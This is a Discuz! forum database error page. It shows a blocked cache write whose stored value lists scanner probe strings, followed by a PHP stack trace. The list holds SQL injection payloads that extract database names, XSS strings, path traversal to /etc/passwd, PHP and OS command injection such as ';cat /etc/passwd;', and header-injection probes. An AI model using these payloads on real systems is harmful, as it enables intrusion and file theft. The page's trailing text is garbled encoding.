Discuz! Database Error

(0) It is not safe to do this query
REPLACE INTO common_cache SET `cachekey`='threadclasscount_100' , `cachevalue`='a:1:{s:6:\"sortid\";a:84:{i:3;s:1:\"5\";s:2:\"3 \";s:1:\"6\";s:9:\"3 and 3=3\";s:1:\"6\";s:9:\"3 and 3=4\";s:1:\"6\";s:17:\"3\\\' and \\\'a\\\'=\\\'a\";s:1:\"6\";s:17:\"3\\\' and \\\'a\\\'=\\\'b\";s:1:\"6\";s:25:\"3%\\\' and 3=3 and \\\'%\\\'=\\\'\";s:1:\"6\";s:236:\"3 and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1\";s:1:\"6\";s:244:\"3\\\' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and \\\'1\\\'=\\\'1\";s:1:\"6\";s:244:\"3%\\\' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and \\\'%\\\'=\\\'\";s:1:\"6\";s:47:\"3+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-\";s:1:\"6\";s:3:\"3\\\'\";s:1:\"6\";s:4:\"3%27\";s:1:\"6\";s:5:\"3\\0\\\'\";s:1:\"6\";s:5:\"3\\\\\\\'\";s:1:\"6\";s:5:\"3JyI=\";s:1:\"6\";s:4:\"3\\'\";s:1:\"6\";s:2:\"3/\";s:1:\"6\";s:13:\"3alert(42873)\";s:1:\"6\";s:32:\"../../../../../../../../boot.ini\";s:1:\"6\";s:34:\"../../../../../../../../boot.ini\\0\";s:1:\"6\";s:56:\"boot.ini\";s:1:\"6\";s:38:\"../../../../../../../../boot.ini\\0.jpg\";s:1:\"6\";s:51:\"/.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./boot.ini\";s:1:\"6\";s:40:\"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\boot.ini\";s:1:\"6\";s:64:\"../..//../..//../..//../..//../..//../..//../..//../..//boot.ini\";s:1:\"6\";s:80:\"../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini\";s:1:\"6\";s:38:\"../../../../../../../../boot.ini\\0.htm\";s:1:\"6\";s:19:\"file:///c:/boot.ini\";s:1:\"6\";s:34:\"../../../../../../../../etc/passwd\";s:1:\"6\";s:36:\"../../../../../../../../etc/passwd\\0\";s:1:\"6\";s:36:\"\\0../../../../../../../../etc/passwd\";s:1:\"6\";s:41:\"../../../../../../../../etc/passwd\\0.html\";s:1:\"3\";s:40:\"../../../../../../../../etc/passwd\\0.jpg\";s:1:\"3\";s:52:\".\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./etc/passwd\";s:1:\"3\";s:11:\"/etc/passwd\";s:1:\"6\";s:25:\"/./././././././etc/passwd\";s:1:\"6\";s:82:\"../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd\";s:1:\"6\";s:42:\"................etc/passwd\";s:1:\"6\";s:59:\"/etc/passwd\";s:1:\"6\";s:18:\"file:///etc/passwd\";s:1:\"6\";s:66:\"../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd\";s:1:\"6\";s:70:\"http://some-inexistent-website.com/some_inexistent_file_with_long_name\";s:1:\"6\";s:36:\"/some_inexistent_file_with_long_name\";s:1:\"6\";s:43:\"\r\n SomeCustomInjectedHeader:injected_by_wvs\";s:1:\"3\";s:42:\"\n SomeCustomInjectedHeader:injected_by_wvs\";s:1:\"3\";s:3:\"dir\";s:1:\"6\";s:25:\"http://bbs.webscan.360.cn\";s:1:\"3\";s:18:\"bbs.webscan.360.cn\";s:1:\"3\";s:46:\"+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-\";s:1:\"6\";s:3:\"3[]\";s:1:\"6\";s:12:\"3\\0xa7\";s:1:\"6\";s:2:\"3)\";s:1:\"6\";s:5:\"3!(()\";s:1:\"6\";s:39:\"../../../../../../../../boot.ini\\0.html\";s:1:\"6\";s:12:\"C:\\\\boot.ini\";s:1:\"6\";s:40:\"................boot.ini\";s:1:\"6\";s:41:\"|..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\boot.ini\";s:1:\"6\";s:38:\"../../../../../../../../boot.ini\\0.txt\";s:1:\"6\";s:30:\"................windowswin.ini\";s:1:\"6\";s:42:\"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\etc/passwd\";s:1:\"6\";s:35:\"|../../../../../../../../etc/passwd\";s:1:\"6\";s:42:\"../../../../../../../../../../etc/passwd\\0\";s:1:\"6\";s:58:\"..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd\";s:1:\"6\";s:42:\".../.../.../.../.../.../.../.../etc/passwd\";s:1:\"6\";s:43:\"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\/etc/passwd\";s:1:\"6\";s:26:\"................etc/passwd\";s:1:\"6\";s:43:\"................/etc/passwd\";s:1:\"6\";s:44:\"\r\n SomeCustomInjectedHeader:injected_by_test\";s:1:\"6\";s:43:\"\n SomeCustomInjectedHeader:injected_by_test\";s:1:\"6\";s:18:\"oxoxoxoxoxoxox.com\";s:1:\"6\";s:19:\";print(md5(1122));#\";s:1:\"6\";s:23:\"\\\');print(md5(1122));//\";s:1:\"6\";s:20:\"${@print(md5(1122))}\";s:1:\"6\";s:7:\"phpinfo\";s:1:\"6\";s:29:\"http://hitBAo6EKQnyr.bxss.me/\";s:1:\"6\";s:29:\"http://hitd0rQGQge8t.bxss.me/\";s:1:\"6\";s:36:\"http://testasp.vulnweb.com/t/fit.txt\";s:1:\"6\";s:7:\"set|set\";s:1:\"6\";s:17:\";cat /etc/passwd;\";s:1:\"6\";s:21:\"`ping -c 5 127.0.0.1`\";s:1:\"6\";s:21:\"|ping -n 5 127.0.0.1|\";s:1:\"6\";s:20:\"|ping -c 4 127.0.0.1\";s:1:\"6\";s:31:\"response.write(9412458*9542755)\";s:1:\"6\";}}'

PHP Debug

No.FileLineCode
1forum.php71require(%s)
2source/module/forum/forum_forumdisplay.php544threadclasscount(%s, %f, %s, %s)
3source/function/function_forumlist.php400discuz_table->insert(Array, false, true)
4source/class/discuz/discuz_table.php81discuz_database::insert(%s, Array, false, true, false)
5source/class/discuz/discuz_database.php60discuz_database::query(%s, %s, %s, true)
6source/class/discuz/discuz_database.php135discuz_database::checkquery(%s)
7source/class/discuz/discuz_database.php172discuz_database_safecheck::checkquery(%s)
8source/class/discuz/discuz_database.php362break()
www.fishing-sh.com Ѿ˳Ϣϸ¼, ɴ˸ķʲǸ. Need Help?